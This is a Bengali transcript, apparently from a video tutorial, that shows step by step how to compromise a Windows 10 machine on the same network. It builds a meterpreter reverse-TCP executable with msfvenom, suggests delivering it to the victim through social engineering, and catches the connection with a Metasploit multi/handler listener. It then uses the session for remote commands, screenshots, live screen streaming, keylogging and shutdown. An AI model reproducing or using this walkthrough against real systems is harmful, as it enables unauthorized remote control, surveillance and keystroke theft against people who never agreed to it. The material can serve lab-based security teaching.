হ্যালো এভরিওয়ান, আজকের এই ভিডিওতে আমরা দেখব যদি অ্যাটাকার এবং ভিকটিম যদি সেম নেটওয়ার্কের আন্ডারে থাকে এবং ভিকটিম যদি উইন্ডোজ অপারেটিং সিস্টেম ইউজ করে থাকে, তাহলে অ্যাটাকার কিভাবে উইন্ডোজের জন্য পেলোড অর রিভার্সাল ক্রিয়েট করে সে উইন্ডোজের অ্যাক্সেস নেয় তা দেখব। সো ফার্স্ট অফ অল আগে অ্যাটাকার মেশিন হতে আমরা আগে একটা পেলোড ক্রিয়েট করব। সো পেলোড, তার জন্য আমাদের কমান্ড দিতে হবে। আমরা একটা টুল ইউজ করব msf venom। এরপরে আমরা -p দেব, -p তে পেলোড। এরপরে দেব আমরা যেহেতু উইন্ডোজের জন্য পেলোড ক্রিয়েট করব, সো উইন্ডোজ windows meterpreter reverse underscore tcp। আমরা টিসিপির জন্য আমরা পেলোড ক্রিয়েট করব টিসিপি ট্রাফিক ইউজ করে। সো এখানে টিসিপি দিলাম। এরপরে দিতে হবে আমাদের লোকাল হোস্ট সেট করতে হবে। সো লোকাল হোস্ট ইকুয়ালস টু লোকাল হোস্টের আইপি দিতে হবে আমাদের। সো লোকাল হোস্টের আইপি হলো ifconfig লোকাল হোস্ট, অর্থাৎ আমাদের এই মেশিনের আইপি। সো আমাদের মেশিনের আইপি হলো এটা। সো এখানে কপি করলাম, এরপর পেস্ট করলাম। এরপরে হলো আমাদের পোর্ট সেট করতে হবে, যে পোর্টের মাধ্যমে আমরা অ্যাক্সেস নেব। এল পোর্ট ইকুয়ালস টু সাপোজ এল পোর্ট দিব হলো 443। এরপরে দিব ফরম্যাট হবে ফরম্যাট হবে exe অ্যান্ড এরপর হবে রিভার্সাল। সো রিভার্সালের নাম দিলাম সাপোজ shell.exe দেই। সো এরপর দেখি পেলোড জেনারেট হচ্ছে। সো পেলোড জেনারেট হয়ে গেছে আমাদের। সো পেলোডটা হলো এটা হলো আমাদের পেলোড ক্রিয়েট হয়ে গেছে। এরপর আমাদেরকে যে কোনো ওয়েতে ভিকটিম মেশিনে এই পেলোডটা সেন্ড করতে হবে। তো আমি সেন্ড করে দেই। তো এটা হলো আমাদের সেই শেল। তো এই শেলটা আমাদের এই ভিকটিম মেশিনে যে কোনো উপায়ে সেন্ড করতে হবে। তো আমি সেন্ড করে দিলাম, যেহেতু আমার ভার্চুয়াল মেশিন আমি ড্র্যাগ এন্ড ড্রপ করে সেন্ড করে দিলাম। সো রিয়েল লাইফে এটা সোশ্যাল ইঞ্জিনিয়ারিং বা যে কোনো ওয়েতে ভিকটিমের কাছে এই শেলটা পাঠাতে হবে এবং শেলটা রান করাতে হবে। তো শেল রান করার আগে আমি এখানে একটা ক্লিয়ার করে নেই। আমাদের আগে এখানে msf কনসোল নামের একটা টুল আছে, সেটা অন করে নিতে হবে। সো স্টার্টিং msf কনসোল। সো msf কনসোল অর্থাৎ মেটাসপ্লয়েটেবলের যে কনসোলটা আছে মেটাসপ্লয়েটের, সেটা রান হলো। এরপর আমাদের ইউজ কমান্ড দিতে হবে, ইউজ exploit multi handler। এরপর হলো আমাদের পেলোডটা সেট করতে হবে। সো শো পেলোডস, সরি যাই হোক, পেলোডটা হলো সেট পেলোড হলো উইন্ডোজ উইন্ডোজ মিটারপ্রেটার reverse tcp। সরি, এখানে আমার বানান ভুল গেছে, মেবি মিটারপ্রেটার রিভার্স টিসিপি। সো আমার পেলোড সেট হয়েছে। এরপর আমি দেখব এখানে এই পেলোডের জন্য অপশনগুলো দেখি। সরি, কোনোভাবে সেট হয়নি। সেট এল হোস্ট হবে। এখন আমাদের লোকাল হোস্ট সেট হয়েছে। এরপরটা হবে এল পোর্ট এল পোর্ট হবে আমরা যে পোর্ট দিয়েছিলাম 443 দিলাম। সো লোকাল পোর্ট আমাদের সেট হলো, দেখে নেই। সো সেট হয়েছে। এরপরে আমাদের কমান্ড দিতে হবে এক্সপ্লয়েট
এক্সপায়ার্ড বা রান দিলেও একই জিনিস, সমস্যা নেই। সো আমাদের লিসেনার ক্রিয়েট হয়েছে। তো এবার যে কোনো ওয়েতে আমাদের সোশ্যাল ইঞ্জিনিয়ারিং বা যে কোনো ওয়েতে যে আমরা রিভার্স শেলটা পাঠিয়েছিলাম, সো ইউজারকে কোনোভাবে সেটাকে রান করাতে হবে সিস্টেমে। সো আমি যদি রান করাই, সো দেখছেন আমাদের এখানে সেশন ক্রিয়েট হয়ে গেছে এবং কানেকশন এস্টাবলিশ হয়ে গেছে। তখন কানেকশন এস্টাবলিশ হয়েছে কীভাবে আমরা দেখি। আমি যদি দিই সিস ইনফো, আমার এই মেশিনের ইনফরমেশন শো করতেছে। তো আমরা দেখি যে ইনফরমেশনগুলো অ্যাকচুয়ালি রাইট কিনা। সো আমি যদি ভিকটিমে যদি যাই উইনভার লিখি, তো আমাদের দেখেন বিল্ডার নাম্বার দেখেন এখানে, আর এখানে দেখেন বিল্ডার নাম্বার সেম, উইন্ডোজ 10। সো আমাদের এটা উইন্ডোজ 10 অপারেটিং সিস্টেম। এরপর হলো আর্কিটেকচার হলো x64 আর্কিটেকচার, দেখে নিই x64 আর্কিটেকচার প্রপার্টিজ। সো x64 বিট আর্কিটেকচার। তো এবার যদি আমরা এখানে রিভার্স শেল যদি নিতে চাই, অর্থাৎ কমান্ড প্রম্পটের যদি অ্যাক্সেস নেই শেল, সো আমাদের এখন যে ডেস্কটপ আছে ডেস্কটপের আমরা ডেস্কটপে আছি, এখানে আমরা যদি dir দেই তাহলে দেখতে পাচ্ছেন এখানে যে সফটওয়্যারগুলো দেখাচ্ছে এখানে মোটামুটি সবগুলোই দেখাচ্ছে। আমরা যদি এখানে একটু লক্ষ্য করে দেখবেন যে আমি একটা ফোল্ডার ক্রিয়েট করে দেখাই এখানে। সো mkdir সাপোজ টেস্ট নামের একটা ফোল্ডার ক্রিয়েট করব ভিকটিম মেশিনে। সো দেখছেন টেস্ট নামের একটা ফোল্ডার ক্রিয়েট হয়ে গেছে। সো এছাড়াও আরও কিছু অনেক কাজ আমরা করতে পারি, যেমন আমি যদি হেল্প লিখি, সো সরি এটা তো আমরা শেলের মধ্যে হেল্প লিখেছিলাম, আমি যদি শেল থেকে বের হয়ে যাই, সো শেল থেকে বের হওয়ার পর যদি আমরা মিটার বেটারকে যদি আমরা হেল্প লিখি, সো আমরা এই কাজগুলো করতে পারি। যেমন আমি যদি এটা একটা স্ক্রিনশট নিতে চাই, সো যদি একটা স্ক্রিনশট নিতে চাই তাহলে এখানে স্ক্রিনশট কপি করি অ্যান্ড পেস্ট করি, দিলাম স্ক্রিনশট সেভ টু হোম কালি, এরপর এই নামে একটা স্ক্রিনশট সেভ হয়েছে। সো দেখি ডাইরেক্টরিতে গিয়ে দেখি স্ল্যাশ হোম হোম কালি, এরপরে দেখেছেন এই যে আমাদের স্ক্রিনশট নিয়েছে। সো এরপরে আমরা দেখি, আমরা দেখব কি দেখা যায় আর। সো আমরা যদি এখানে স্ক্রিন শেয়ার দেই, দেখি স্ক্রিন শেয়ারে হয় কিনা। কিছু কিছু কাজ করবে, কিছু কিছু কাজ করবে না। সো দেখি এটা কাজ করে কিনা স্ক্রিন শেয়ার স্ট্রিমিং। সো এই যে দেখেন এখানে যা যা মানে এখানে আমি ভিকটিম মেশিনে যা যা হবে এখানে ঠিক তাই দেখাবে। তো আমি যদি ফোল্ডারটা অন করি, দেখেছেন সে ফোল্ডারটা দেখাচ্ছে। সো ইউজার যদি যায় সাপোজ ইয়েতে গেল, সো দেখতে পাচ্ছেন এখানে আমি যা যা করব যা যা দেখব সব কিছু এখানে দেখাচ্ছে। সো বেসিক্যালি এগুলোই, আরও অনেক কাজ করা যায় এটা দিয়ে। হেল্প জাস্ট খালি হেল্প দিব আর দেখবো আর কি, অনেক কাজই করা যায় এখানে। আবার আমরা চাইলে স্ক্রিনশট এখানে আমরা কি লগারও ইউজ করতে পারি। সো এই যে কি স্ক্যান স্টার্ট কিবোর্ড অনেক কাজ করতে পারি। তো আমরা চাইলে এখানে আবার সিস্টেমটাকে শাটডাউন করে ফেলতে পারি। জাস্ট এই শাটডাউন কমান্ড কপি করে জাস্ট এনে পেস্ট করে দিই, পেস্ট করলে এন্টার প্রেস করলে এটা শাটডাউন হয়ে যাবে বা হয়ে যাওয়ার কথা। তো যাই হোক, এভাবেই হ্যাকাররা সিস্টেমের অ্যাক্সেস নিয়ে থাকে এবং সিস্টেম কন্ট্রোল করে থাকে। সো দ্যাটস অল অ্যাবাউট দিস ভিডিও। থ্যাংকস আ লট ফর ওয়াচিং দিস ভিডিও।